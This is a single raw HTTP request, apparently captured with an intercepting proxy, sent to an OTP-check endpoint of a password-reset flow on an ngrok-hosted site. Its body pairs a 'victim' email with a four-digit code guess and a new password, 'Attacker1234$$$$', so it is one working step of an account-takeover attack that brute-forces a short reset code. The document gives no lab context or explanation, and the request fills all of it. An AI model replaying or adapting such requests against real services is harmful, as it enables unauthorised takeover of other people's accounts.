POST /identity/api/auth/v2/check-otp HTTP/2
Host: merlin-declivitous-crowdedly.ngrok-free.dev
Cookie: abuse_interstitial=merlin-declivitous-crowdedly.ngrok-free.dev; chat_session_id=a7a71bf8-09fc-489e-8997-b523cc2657f4
Content-Length: 72
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not-A.Brand";v="24", "Chromium";v="146"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Origin: https://merlin-declivitous-crowdedly.ngrok-free.dev
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://merlin-declivitous-crowdedly.ngrok-free.dev/forgot-password
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"email":"victim@victim.com","otp":"6164","password":"Attacker1234$$$$"}
